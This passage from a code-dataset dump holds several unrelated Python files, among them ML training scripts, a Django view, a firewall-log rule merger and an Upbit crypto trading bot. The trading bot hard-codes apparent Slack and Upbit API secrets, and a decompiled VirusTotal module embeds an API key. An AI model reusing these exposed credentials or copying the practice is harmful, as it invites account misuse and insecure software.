training_args.num_train_epochs\n )\n\n print(\"Evaluation...\")\n\n trainer.evaluate()\n","sub_path":"best-practices/largescale-deep-learning/Training/Bert-Pretrain/src/pretrain_glue_ORT.py","file_name":"pretrain_glue_ORT.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"203237477","text":"# this script is used to plot the spectrum of omega(ky) & gamma(ky) for a given rho\n# Read some input parameter\niplotErr=root['SETTINGS']['PLOTS']['iplotErr']\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('L_Y'):\n L_Y=root['INPUTS']['GYROInput']['input.gyro']['L_Y'] # the reference ky\nelse:\n L_Y=0.3\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_GRID'):\n TOROIDAL_GRID=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_GRID'] # the reference ky\nelse:\n TOROIDAL_GRID=1\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_MIN'):\n TOROIDAL_MIN=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_MIN'] # the reference ky\nelse:\n TOROIDAL_MIN=30\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_SEP'):\n TOROIDAL_SEP=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_SEP'] # the reference ky\nelse:\n TOROIDAL_SEP=10\n\nk=root['SETTINGS']['PLOTS']['ipltspectrum']\n#wr=ones(TOROIDAL_GRID)\n#wr_err=ones(TOROIDAL_GRID)\n#wi=ones(TOROIDAL_GRID)\n#wi_err=ones(TOROIDAL_GRID)\n#for k in linspace(0,TOROIDAL_GRID-1,TOROIDAL_GRID):\nwr=root['OUTPUTSRec']['GYROOutput'][k]['wr']\nwi=root['OUTPUTSRec']['GYROOutput'][k]['wi']\nwr_err=root['OUTPUTSRec']['GYROOutput'][k]['wr_err']\nwi_err=root['OUTPUTSRec']['GYROOutput'][k]['wi_err']\n# calculate ky\nky=L_Y/TOROIDAL_MIN*(TOROIDAL_MIN+linspace(0,TOROIDAL_GRID-1,TOROIDAL_GRID)*TOROIDAL_SEP)\n#rho=root['INPUTS']['GYROInput']['input.gyro']['RADIUS']\np_tgyro=root['SETTINGS']['PLOTS']['p_tgyro']\nrho_max=root['INPUTS']['TGYROInput']['input.tgyro']['TGYRO_RMAX']\nrho_all=linspace(0,rho_max,p_tgyro+1)\nrho=rho_all[k]\nfigure(5)\nfsize=24\nsubplot(1,2,1)\n#plot(ky,wr,'-bo',linewidth=2,label='rho='+str(rho)+' $\\omega$')\nplot(ky,wr,'-bo',linewidth=2,label='$\\omega$')\nif iplotErr==1:\n plot(ky,wr_err,'-ro',linewidth=2,label='$Error$')\n legend(loc=0).draggable(True)\nxlabel('$k_y$',fontsize=fsize,family='serif')\nylabel('$\\omega$',fontsize=fsize,family='serif')\nxticks(fontsize=16,family='serif')\nyticks(fontsize=16,family='serif')\ntitle('rho='+str(rho))\nsubplot(1,2,2)\nplot(ky,wi,'-b*',linewidth=2,label='$\\gamma$')\nif iplotErr==1:\n plot(ky,wi_err,'-r*',linewidth=2,label='$Error$')\n legend(loc=0).draggable(True)\nxticks(fontsize=16,family='serif')\nyticks(fontsize=16,family='serif')\nxlabel('$k_y$',fontsize=fsize,family='serif')\nylabel('$\\gamma$',fontsize=fsize,family='serif')\ntitle('rho='+str(rho))\n","sub_path":"MyInte/SCRIPTS/GYRO/plotspectrum.py","file_name":"plotspectrum.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"401683634","text":"import pandas as pd\nimport numpy as np\nimport preprocessing as pre\nfrom sklearn.svm import LinearSVC\nimport time\nimport evaluatemodel as evm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import GridSearchCV\n\nparam = {'C': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],\n 'class_weight': [None, 'balanced'],\n 'fit_intercept': [False, True],\n 'intercept_scaling': [0, 0.5, 1],\n 'loss': ['hinge', 'squared_hinge'],\n 'max_iter': [10000,11500, 12000, 13500, 15000],\n 'multi_class': ['ovr', 'crammer_singer'],\n 'penalty': ['l1','l2'],\n 'tol': [0.0001, 0.0005, 0.001, 0.005],\n 'verbose': [1, 2, 4, 5, 10, 20]\n }\n\n##Funções de GridSearchCV\ndef config_param(clf, param, cv = 5, n_jobs = 1, scoring = 'balanced_accuracy'):\n grid_class = GridSearchCV(clf, param, cv = cv, n_jobs = n_jobs, scoring = scoring)\n return clf, grid_class\n\ndef get_param(clf, param, X, y):\n clf, grid_class = config_param(clf, param)\n return grid_class.fit(X,y)\n\ndef best_model(clf, X, Y):\n all_param = get_param(clf, param, X, Y)\n best_result = all_param.best_estimator_\n return best_result\n\n## Aplicação das funções de gridsearch para os melhores parâmetros da máquina de vetor suporte\ndef SVMClass():\n print(\"-------------------\")\n print(\"Support Vector Machine\")\n print(\"Início do CVGrid\")\n inicio = time.time()\n clf = LinearSVC()\n XaTrain, XaTest, yaTrain, yaTest = pre.Data()\n svm_class = best_model(clf, XaTrain, yaTrain)\n clf = svm_class.fit(XaTrain, yaTrain)\n yPred = clf.predict(XaTest)\n final = time.time() - inicio\n min = final/60\n print(\"Melhores parâmetros: \")\n print(svm_class)\n print('Tempo de Execução: {} min '.format(min))\n print('Final do CVGrid')\n print(\"-------------------\")\n return XaTrain, XaTest, yaTrain, yaTest, yPred, clf\n\ndef SVMMetrics():\n print(\"-------------------\")\n print(\"Métricas Support Vector Machine\")\n XaTrain, XaTest, yaTrain, yaTest, yPred, clf = SVMClass()\n inicio = time.time()\n evm.CrossValidation(clf, XaTest, yPred)\n final = time.time() - inicio\n min = final/60\n print('Tempo de Execução: {} min '.format(min))\n print('Final das Métricas')\n print(\"-------------------\")\n\ndef PlotSVM():\n XaTrain, XaTest, yaTrain, yaTest, yPred, clf = SVMClass()\n XaTest = pd.DataFrame(XaTest)\n yPred = pd.DataFrame(yPred)\n df = pd.concat([XaTest, yaTest], axis = 1)\n df.insert(27, 'Predições', yPred.values, allow_duplicates = False)\n sns.relplot(data=df, x=\"Banda 1\", y='Nuvem Alta', hue = 'Predições')\n plt.show()\n","sub_path":"GridTotalCloud/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"484846531","text":"# coding=utf-8\nimport json\nfrom django.http.response import HttpResponse\nfrom django.db.models import CharField, Value as V\nfrom django.db.models.functions import Concat\nfrom rest_framework.views import APIView\nfrom bims.models.biological_collection_record import BiologicalCollectionRecord\nfrom sass.models import SiteVisit\n\n\nclass CollectorList(APIView):\n \"\"\"API for listing all biological collection record collectors.\"\"\"\n\n def get(self, request, *args):\n assessors = (\n SiteVisit.objects.all().exclude(\n assessor__isnull=True\n ).annotate(\n full_name=Concat(\n 'assessor__first_name', V(' '), 'assessor__last_name',\n output_field=CharField()\n )\n ).distinct('full_name').order_by(\n 'full_name'\n ).values_list('full_name', flat=True)\n )\n collectors = (\n BiologicalCollectionRecord.objects.filter(\n validated=True).exclude(\n collector__exact='').values_list(\n 'collector', flat=True).distinct(\n 'collector'\n ).order_by('collector')\n )\n all_users = list(assessors) + list(collectors)\n all_users = list(set(all_users))\n all_users.sort()\n user_index = 0\n if len(all_users) > 0:\n while all_users[user_index] == ' ':\n user_index += 1\n return HttpResponse(\n json.dumps(all_users[user_index:]),\n content_type='application/json'\n )\n","sub_path":"bims/api_views/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"200571780","text":"import pyupbit\nimport random\nimport time\nimport requests\n\ndef post_message(token, channel, text):\n response = requests.post(\"https://slack.com/api/chat.postMessage\",\n headers={\"Authorization\": \"Bearer \" + token},\n data={\"channel\": channel, \"text\": text})\n #print(response)\n\nmyToken = \"xoxb-2214036150211-2213836848130-MGOLLe5LfbVZP5h8buojkHCY\"\npost_message(myToken, \"#stock\", \"코인 자동매매 시작\")\n\n#def dbgout(message):\n# \"\"\"인자로 받은 문자열을 파이썬 셸과 슬랙으로 동시에 출력한다.\"\"\"\n# print(datetime.now().strftime('[%m/%d %H:%M:%S]'), message)\n# strbuf = datetime.now().strftime('[%m/%d %H:%M:%S] ') + message\n# post_message(myToken,\"#stock\", strbuf)\n\naccess = \"W0pBEN1VwvBvTHtp8zD2hVfgxufsv0PHzrgwCbaS\"\nsecret = \"z0iST1K4uhFwP1QKX8riwXmIPxwRsPu4xnUr9KKw\"\n\ntickers = pyupbit.get_tickers(fiat=\"KRW\") #업비트에 있는 원화코인만 검색\nrandom.shuffle(tickers) ## ticker 랜덤으로 Scan 하도록 명령.\n\n#post_message(myToken, \"#stock\", \"종목:\" + str(tickers) + \"매수 완료\")\n#post_message(myToken, \"#stock\", \"종목:\" + str(tickers) + \"매도 완료\")\n\ndef get_target_price(ticker):\n \"\"\"종목 5분봉 현재 이전 종가 가격\"\"\"\n Y_lp_ma5 = pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n Y_lm5_price = Y_lp_ma5['close'].rolling(5).mean()\n Y_lm5_list = Y_lm5_price.iloc[-2]\n return Y_lm5_list\n\ndef get_current_price(ticker):\n \"\"\"종목 5분봉 현재 가격\"\"\"\n Now_lp_ma5 = pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n Now_lm5_price = Now_lp_ma5['close'].rolling(5).mean()\n Now_lm5_list = Now_lm5_price.iloc[-1]\n return Now_lm5_list\n\ndef sell_target_price(ticker):\n \"\"\"종목 5분봉 10일선 현재 가격\"\"\"\n Now_lp_ma10 = pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n Now_lm10_price = Now_lp_ma10['close'].rolling(10).mean()\n Now_lm10_list = Now_lm10_price.iloc[-1]\n return Now_lm10_list\n\ndef buy_crypto_currency(ticker):\n krw = upbit.get_balance(ticker=\"KRW\") # 잔고에 남아있는 돈 얻어옴\n buy_price = pyupbit.get_current_price(ticker) #종목 현재가(매수가)\n unit = krw / float(buy_price) #원화 잔고를 최우선 매도가로 나눠서 구매 가능한 수량을 계산\n unit2 = unit - unit * 0.05 #주문 수량에서 수수료(unit * 0.015) 뺀 가격\n upbit.buy_limit_order(ticker, buy_price, unit2) #종목, 매수가, 매수 수량\n #upbit.buy_market_order(ticker, krw)\n #print(\"%s %s개 매수\" % ticker, unit)\n\ndef sell_crypto_currency(ticker):\n unit = upbit.get_balance(ticker)\n upbit.sell_market_order(ticker, unit)\n\n# 로그인\nupbit = pyupbit.Upbit(access, secret)\nprint(\"자동매매 시작\")\n\nwhile True:\n for ticker in tickers:\n target_price = get_target_price(ticker) + get_target_price(ticker) * 0.02\n current_price = get_current_price(ticker)\n sell_price = sell_target_price(ticker)\n try:\n if target_price < current_price:\n buy_crypto_currency(ticker)\n print(\"종목 :\", ticker)\n print(\"매수 완료\")\n post_message(myToken, \"#stock\", \"종목:\" + str(ticker) + \"매수 완료\")\n else:\n if current_price < sell_price:\n sell_crypto_currency(ticker)\n print(\"종목 :\", ticker)\n print(\"매도 완료\")\n post_message(myToken, \"#stock\", \"종목:\" + str(ticker) + \"매도 완료\")\n except:\n time.sleep(0.5)\n time.sleep(1)\n print(\"-----------------------잠시 대기 중-----------------------\")\n #post_message(myToken, \"#stock\", \"잠시 대기 중\")\n","sub_path":"Upbit_auto.py","file_name":"Upbit_auto.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"418447651","text":"# -*-coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function\n\nimport tensorflow as tf\n\nfrom libs.models.detectors.single_stage_base_network import DetectionNetworkBase\nfrom libs.models.losses.losses import Loss\nfrom libs.utils import bbox_transform, nms_rotate\nfrom libs.utils.coordinate_convert import coordinate_present_convert\nfrom libs.models.samplers.retinanet.anchor_sampler_retinenet import AnchorSamplerRetinaNet\n\n\nclass DetectionNetworkRetinaNet(DetectionNetworkBase):\n\n def __init__(self, cfgs, is_training):\n super(DetectionNetworkRetinaNet, self).__init__(cfgs, is_training)\n self.anchor_sampler_retinenet = AnchorSamplerRetinaNet(cfgs)\n self.losses = Loss(self.cfgs)\n\n def build_whole_detection_network(self, input_img_batch, gtboxes_batch_h=None, gtboxes_batch_r=None, gpu_id=0):\n\n if self.is_training:\n gtboxes_batch_h = tf.reshape(gtboxes_batch_h, [-1, 5])\n gtboxes_batch_h = tf.cast(gtboxes_batch_h, tf.float32)\n\n gtboxes_batch_r = tf.reshape(gtboxes_batch_r, [-1, 6])\n gtboxes_batch_r = tf.cast(gtboxes_batch_r, tf.float32)\n\n if self.cfgs.USE_GN:\n input_img_batch = tf.reshape(input_img_batch, [1, self.cfgs.IMG_SHORT_SIDE_LEN,\n self.cfgs.IMG_MAX_LENGTH, 3])\n\n # 1. build backbone\n feature_pyramid = self.build_backbone(input_img_batch)\n\n # 2. build rpn\n rpn_box_pred_list, rpn_cls_score_list, rpn_cls_prob_list = self.rpn_net(feature_pyramid, 'rpn_net')\n rpn_box_pred = tf.concat(rpn_box_pred_list, axis=0)\n rpn_cls_score = tf.concat(rpn_cls_score_list, axis=0)\n rpn_cls_prob = tf.concat(rpn_cls_prob_list, axis=0)\n\n # 3. generate anchors\n anchor_list = self.make_anchors(feature_pyramid)\n anchors = tf.concat(anchor_list, axis=0)\n\n # 4. build loss\n if self.is_training:\n with tf.variable_scope('build_loss'):\n labels, target_delta, anchor_states, target_boxes = tf.py_func(func=self.anchor_sampler_retinenet.anchor_target_layer,\n inp=[gtboxes_batch_h,\n gtboxes_batch_r, anchors, gpu_id],\n Tout=[tf.float32, tf.float32, tf.float32,\n tf.float32])\n\n if self.method == 'H':\n self.add_anchor_img_smry(input_img_batch, anchors, anchor_states, 0)\n else:\n self.add_anchor_img_smry(input_img_batch, anchors, anchor_states, 1)\n\n cls_loss = self.losses.focal_loss(labels, rpn_cls_score, anchor_states)\n\n if self.cfgs.REG_LOSS_MODE == 0:\n reg_loss = self.losses.iou_smooth_l1_loss_log(target_delta, rpn_box_pred, anchor_states,\n target_boxes, anchors)\n elif self.cfgs.REG_LOSS_MODE == 1:\n reg_loss = self.losses.iou_smooth_l1_loss_exp(target_delta, rpn_box_pred, anchor_states,\n target_boxes, anchors, alpha=self.cfgs.ALPHA,\n beta=self.cfgs.BETA)\n else:\n reg_loss = self.losses.smooth_l1_loss(target_delta, rpn_box_pred, anchor_states)\n\n self.losses_dict['cls_loss'] = cls_loss * self.cfgs.CLS_WEIGHT\n self.losses_dict['reg_loss'] = reg_loss * self.cfgs.REG_WEIGHT\n\n # 5. postprocess\n with tf.variable_scope('postprocess_detctions'):\n boxes, scores, category = self.postprocess_detctions(rpn_bbox_pred=rpn_box_pred,\n rpn_cls_prob=rpn_cls_prob,\n anchors=anchors)\n boxes = tf.stop_gradient(boxes)\n scores = tf.stop_gradient(scores)\n category = tf.stop_gradient(category)\n\n if self.is_training:\n return boxes, scores, category, self.losses_dict\n else:\n return boxes, scores, category\n\n def postprocess_detctions(self, rpn_bbox_pred, rpn_cls_prob, anchors):\n\n return_boxes_pred = []\n return_scores = []\n return_labels = []\n for j in range(0, self.cfgs.CLASS_NUM):\n scores = rpn_cls_prob[:, j]\n if self.is_training:\n indices = tf.reshape(tf.where(tf.greater(scores, self.cfgs.VIS_SCORE)), [-1, ])\n else:\n indices = tf.reshape(tf.where(tf.greater(scores, self.cfgs.FILTERED_SCORE)), [-1, ])\n\n anchors_ = tf.gather(anchors, indices)\n rpn_bbox_pred_ = tf.gather(rpn_bbox_pred, indices)\n scores = tf.gather(scores, indices)\n\n if self.method == 'H':\n x_c = (anchors_[:, 2] + anchors_[:, 0]) / 2\n y_c = (anchors_[:, 3] + anchors_[:, 1]) / 2\n h = anchors_[:, 2] - anchors_[:, 0] + 1\n w = anchors_[:, 3] - anchors_[:, 1] + 1\n theta = -90 * tf.ones_like(x_c)\n anchors_ = tf.transpose(tf.stack([x_c, y_c, w, h, theta]))\n\n if self.cfgs.ANGLE_RANGE == 180:\n anchors_ = tf.py_func(coordinate_present_convert,\n inp=[anchors_, -1],\n Tout=[tf.float32])\n anchors_ = tf.reshape(anchors_, [-1, 5])\n\n boxes_pred = bbox_transform.rbbox_transform_inv(boxes=anchors_, deltas=rpn_bbox_pred_)\n\n if self.cfgs.ANGLE_RANGE == 180:\n _, _, _, _, theta = tf.unstack(boxes_pred, axis=1)\n indx = tf.reshape(tf.where(tf.logical_and(tf.less(theta, 0), tf.greater_equal(theta, -180))), [-1, ])\n boxes_pred = tf.gather(boxes_pred, indx)\n scores = tf.gather(scores, indx)\n\n boxes_pred = tf.py_func(coordinate_present_convert,\n inp=[boxes_pred, 1],\n Tout=[tf.float32])\n boxes_pred = tf.reshape(boxes_pred, [-1, 5])\n\n nms_indices = nms_rotate.nms_rotate(decode_boxes=boxes_pred,\n scores=scores,\n iou_threshold=self.cfgs.NMS_IOU_THRESHOLD,\n max_output_size=100 if self.is_training else 1000,\n use_gpu=False)\n\n tmp_boxes_pred = tf.reshape(tf.gather(boxes_pred, nms_indices), [-1, 5])\n tmp_scores = tf.reshape(tf.gather(scores, nms_indices), [-1, ])\n\n return_boxes_pred.append(tmp_boxes_pred)\n return_scores.append(tmp_scores)\n return_labels.append(tf.ones_like(tmp_scores) * (j + 1))\n\n return_boxes_pred = tf.concat(return_boxes_pred, axis=0)\n return_scores = tf.concat(return_scores, axis=0)\n return_labels = tf.concat(return_labels, axis=0)\n\n return return_boxes_pred, return_scores, return_labels\n","sub_path":"libs/models/detectors/retinenet/build_whole_network.py","file_name":"build_whole_network.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"334857653","text":"import time\nfrom typing import List, Tuple\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchtext.data as tt\nfrom sklearn.metrics import confusion_matrix\n\nfrom q3_model import RNNPOSTagger\nfrom tools import print_cm, load_ud_pos_data, EarlyStopping\n\n\ndef train(model: RNNPOSTagger, train_iter: tt.Iterator, val_iter: tt.Iterator,\n optimizer: optim.Optimizer, criterion: nn.Module, epochs: int,\n short_train: bool = False, patience: int = 3):\n \"\"\"\n Trains a model.\n\n :param model: The model to train\n :param train_iter: The training iterator\n :param val_iter: The validation iterator\n :param optimizer: The optimizer\n :param criterion: The loss function\n :param epochs: The number of epochs to train for\n :param short_train: If True, only train every 20 batches\n :param patience: The max # of loss-increasing epochs before early stopping \n :return: None\n \"\"\"\n early_stopping = EarlyStopping(patience=patience, verbose=False, filename='q3_checkpoint.pt')\n for epoch in range(epochs):\n start_time = time.time()\n epoch_loss = 0.\n total_batches = 0\n for batch_idx, batch in enumerate(train_iter):\n if short_train and batch_idx % 20 != 0:\n continue\n\n # Forward pass\n optimizer.zero_grad()\n output, _ = model.forward(batch.text)\n batch_loss = 0.\n for i in range(output.size()[0]):\n batch_loss += criterion(output[i, :, :].squeeze(),\n batch.udtags[i, :].squeeze())\n\n # Backward pass\n batch_loss.backward(retain_graph=True)\n optimizer.step()\n\n # Record the total loss\n epoch_loss += batch_loss\n total_batches += 1\n\n # Finish training, print status to stdout\n duration = (time.time() - start_time)\n accuracy, unk_accuracy, val_loss = evaluate(model, val_iter, criterion)\n print(\"Epoch %d\" % epoch, end=\": \")\n print(\"loss per batch = %.4f\" % (epoch_loss / total_batches), end=\", \")\n print(\"val loss = %.4f\" % val_loss, end=\", \")\n print(\"val acc = %.4f\" % accuracy, end=\", \")\n print(\"unk acc = %.4f\" % unk_accuracy, end=\" \")\n print(\"(%.3f sec)\" % duration)\n early_stopping(val_loss, model)\n if early_stopping.early_stop:\n print(\"Early stopping, reloading checkpoint model\")\n model.load_state_dict(torch.load('q3_checkpoint.pt'))\n break\n\ndef eval_sent(model: RNNPOSTagger, sentence_list: List[str]) -> \\\n List[List[str]]:\n \"\"\"\n Runs the model on a list of sentences.\n\n :param model: The model to run\n :param sentence_list: A list of input sentences that the model will\n tag. Each sentence is a string of words separated by spaces. See\n the script at the bottom for an example\n :return: The POS tags of each sentence in sentence_list\n \"\"\"\n predictions = []\n sentences = [model.text_field.tokenize(s) for s in sentence_list]\n indices = model.text_field.process(sentences)\n model_output = model.forward(indices)[0].argmax(2)\n for i in range(len(sentences)):\n predictions.append([model.tag_field.vocab.itos[j]\n for j in model_output[1:-1, i]])\n\n return predictions\n\n\ndef evaluate(model: RNNPOSTagger, eval_iter: tt.Iterator, criterion: nn.Module,\n conf_matrix: bool = False) -> Tuple[float, float]:\n \"\"\"\n Evaluates a model.\n\n :param model: The model to evaluate\n :param eval_iter: The testing or validation iterator\n :param conf_matrix: If true, a confusion matrix will be printed to\n stdout\n :return: The model's accuracy on the provided dataset\n \"\"\"\n pad_token = model.tag_field.pad_token\n bos_token = model.tag_field.init_token\n eos_token = model.tag_field.eos_token\n unk_token = model.text_field.unk_token\n\n pad_index = model.tag_field.vocab.stoi[pad_token]\n bos_index = model.tag_field.vocab.stoi[bos_token]\n eos_index = model.tag_field.vocab.stoi[eos_token]\n unk_index = model.text_field.vocab.stoi[unk_token]\n\n pads, correct, tries, unks, unk_correct, loss = 0., 0., 0., 0., 0., 0.\n pred_list, target_list = np.array([]), np.array([])\n for i, batch in enumerate(eval_iter):\n sentence_length, batch_size = batch.text.size()\n\n # Mask out , , and \n pad_mask = (batch.udtags == pad_index)\n bos_mask = (batch.udtags == bos_index)\n eos_mask = (batch.udtags == eos_index)\n other_mask = pad_mask | bos_mask | eos_mask\n others = torch.sum(other_mask)\n\n # Count the number of \n unk_mask = (batch.text == unk_index)\n unks += torch.sum(unk_mask)\n\n # Count the total number of words evaluated\n tries += (sentence_length * batch_size) - others\n\n # Compute model output\n \n y_hat, _ = model.forward(batch.text)\n model_output = y_hat.argmax(2)\n\n #compute batch loss \n for i in range(sentence_length):\n loss += criterion(y_hat[i,:,:].squeeze(), batch.udtags[i,:].squeeze())\n\n target_list = np.concatenate((target_list,\n batch.udtags.view(-1).numpy()))\n pred_list = np.concatenate((pred_list, model_output.view(-1).numpy()))\n\n # Count correct predictions\n correct_mask = (batch.udtags == model_output) & ~other_mask\n correct += torch.sum(correct_mask)\n unk_correct += torch.sum(unk_mask & correct_mask)\n\n # Compute accuracy\n accuracy = correct / tries\n unk_accuracy = unk_correct / unks\n\n # Display a confusion matrix\n if conf_matrix:\n target_list = [model.tag_field.vocab.itos[int(target)]\n for target in target_list]\n pred_list = [model.tag_field.vocab.itos[int(pred)]\n for pred in pred_list]\n cm = confusion_matrix(target_list, pred_list,\n labels=model.tag_field.vocab.itos)\n print_cm(cm, model.tag_field.vocab.itos)\n\n return accuracy.item(), unk_accuracy.item(), (loss.item() / i)\n\n\nif __name__ == \"__main__\":\n # Problem 3d: Use this script to test your code.\n # My results for the hyperparameter tuning are in a separate text file.\n train_iter, val_iter, test_iter, text_field, tag_field = \\\n load_ud_pos_data(10, min_freq=2)\n\n # Set up the model\n tagger = RNNPOSTagger(text_field, tag_field, 20, 10, bidir=False)\n pad_token = tag_field.pad_token\n pad_index = tag_field.vocab.stoi[pad_token]\n criterion = nn.CrossEntropyLoss(ignore_index=pad_index)\n optimizer = optim.Adam(tagger.parameters(), lr=1e-3)\n\n # Train the model\n train(tagger, train_iter, val_iter, optimizer, criterion, 40,\n short_train=True)\n\n # Test the model\n sent = [\"if you push it , it will never work .\"]\n print(sent[0], \"POS tags:\", ' '.join(eval_sent(tagger, sent)[0]))\n print(\"test set acc = %.4f, test set unk acc = %.4f, test set loss = %.4f\" %\n evaluate(tagger, test_iter, criterion))\n","sub_path":"RNN Part of Speech Tagger/q3_classifier.py","file_name":"q3_classifier.py","file_ext":"py","file_size_in_byte":7166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"405515886","text":"# -*- coding: utf-8 -*-\nimport csv\nfrom DefAttri import Rule, printRules, printSortRules\n\nif __name__ == \"__main__\":\n Rules = set()\n ResultRules = set()\n MergeFlag = False\n #读取文件\n print(\"Loading syslog, pleasing waiting ...\\n\")\n with open('yixiao-tcp.csv', 'r', encoding='UTF-8') as csvfile:\n reader = csv.reader(csvfile, dialect='excel', delimiter=\",\")\n for i, rows in enumerate(reader):\n src1 = rows[0].encode('utf-8').decode('utf-8-sig') # 去掉\\ufeff\n dest1 = rows[1].encode('utf-8').decode('utf-8-sig')\n port1 = rows[2].encode('utf-8').decode('utf-8-sig')\n count = int(rows[3].encode('utf-8').decode('utf-8-sig'))\n temprule = Rule(src1, dest1, port1, count)\n Rules.add(temprule)\n print('加载第 %d 条日志,请等待...'%i)\n # Rules.add(Rule(src1,dest1,port1))\n # temprule = Rule(rows[0],rows[1],rows[2])\n\n #RULES 自合并\n i = len(Rules) #以rule的里面的规则数为计数\n while len(Rules) != 0:\n temprule = Rules.pop() #先找一条出来\n i -= 1 #计数器要相应的减1\n print(\"Raw Rules are %d Results are %d\\n\"%(len(Rules), len(ResultRules)))\n for rule in Rules: #开始循环\n if temprule.MergeRule(rule): #开始合并\n Rules.discard(rule) #合并成功,则删掉此规则\n MergeFlag = True #合并成功标志\n i = i-1 #rule的数量减少1条,合并的规则送回去继续合并\n break #跳出当前循环,进行set规则清理\n if not MergeFlag: #如果没有合并成功,说明这条规则是单独的, 送回最终的规则库里\n ResultRules.add(temprule)\n else:\n Rules.add(temprule) #有合并成功的,则继续需要合并\n i += 1 # 加回去的,计数器要加1\n MergeFlag = False #再次的合并成功的标志\n\n # print('整理IP中,大约需要15分钟,请等待...')\n # j = 1\n # for i in ResultRules:\n # print('整理第 %d 条,请等待'%j)\n # i.ConvertIP()\n # j += 1\n\n\n # #规则输出到文件 规则输出到文件 规则输出到文件 规则输出到文件\n # print(\"结果输出到文件中,请等待...\")\n # ruletxt = open('Rules.txt', 'w')\n # rawtxt = open('rawRules.txt', 'w')\n # printRules(ruletxt, rawtxt, ResultRules)\n # ruletxt.close()\n # rawtxt.close()\n\n\n\n # 按照rulePort 类型,即服务类型输出到文件\n print(\"结果输出到文件中,请等待...\")\n rawtxt = open('sortRules.txt', 'w')\n printSortRules(rawtxt, ResultRules)\n rawtxt.close()\n print(\"执行完成,结束。\")\n","sub_path":"MakeRule.py","file_name":"MakeRule.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"81571909","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/nex/projects/snoopdroid/snoopdroid/virustotal.py\n# Compiled at: 2020-04-03 08:08:14\n# Size of source mod 2**32: 3192 bytes\nimport time, requests\nfrom halo import Halo\nfrom terminaltables import AsciiTable\nfrom .ui import info, highlight, red\n\ndef get_virustotal_report(hashes):\n apikey = '233f22e200ca5822bd91103043ccac138b910db79f29af5616a9afe8b6f215ad'\n url = 'https://www.virustotal.com/partners/sysinternals/file-reports?apikey={}'.format(apikey)\n items = []\n for sha256 in hashes:\n items.append({'hash':sha256, \n 'image_path':'unknown', \n 'creation_datetime':'unknown'})\n else:\n headers = {'User-Agent':'VirusTotal', \n 'Content-Type':'application/json'}\n res = requests.post(url, headers=headers, json=items)\n if res.status_code == 200:\n report = res.json()\n return report['data']\n\n\ndef virustotal_lookup(packages):\n print(info('Looking up all extracted files on ' + highlight('VirusTotal') + ' (www.virustotal.com).'))\n print('')\n detections = {}\n\n def virustotal_query(batch):\n report = get_virustotal_report(batch)\n if report:\n for entry in report:\n if entry['hash'] not in detections and entry['found'] == True:\n detections[entry['hash']] = entry['detection_ratio']\n\n with Halo(text='', spinner='bouncingBar') as (spinner):\n batch = []\n for package in packages:\n for file in package.files:\n batch.append(file['sha256'])\n if len(batch) == 25:\n spinner.text = 'Looking up first 25 apps...'\n virustotal_query(batch)\n batch = []\n\n else:\n if batch:\n spinner.text = 'Looking up remaining files...'\n virustotal_query(batch)\n spinner.succeed('Completed!')\n\n table_data = []\n table_data.append(['Package name', 'File path', 'Detections'])\n for package in packages:\n for file in package.files:\n row = [\n package.name, file['stored_path']]\n if file['sha256'] in detections:\n detection = detections[file['sha256']]\n positives = detection.split('/')[0]\n if int(positives) > 0:\n row.append(red(detection))\n else:\n row.append(detection)\n else:\n row.append('not found')\n table_data.append(row)\n else:\n print('')\n table = AsciiTable(table_data)\n print(table.table)","sub_path":"pycfiles/snoopdroid-2.3-py3-none-any/virustotal.cpython-38.py","file_name":"virustotal.cpython-38.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593819307","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass MybankPaymentTradeBusinessOperateQueryModel(object):\n\n def __init__(self):\n self._order_no = None\n self._request_no = None\n\n @property\n def order_no(self):\n return self._order_no\n\n @order_no.setter\n def order_no(self, value):\n self._order_no = value\n @property\n def request_no(self):\n return self._request_no\n\n @request_no.setter\n def request_no(self, value):\n self._request_no = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.order_no:\n if hasattr(self.order_no, 'to_alipay_dict'):\n params['order_no'] = self.order_no.to_alipay_dict()\n else:\n params['order_no'] = self.order_no\n if self.request_no:\n if hasattr(self.request_no, 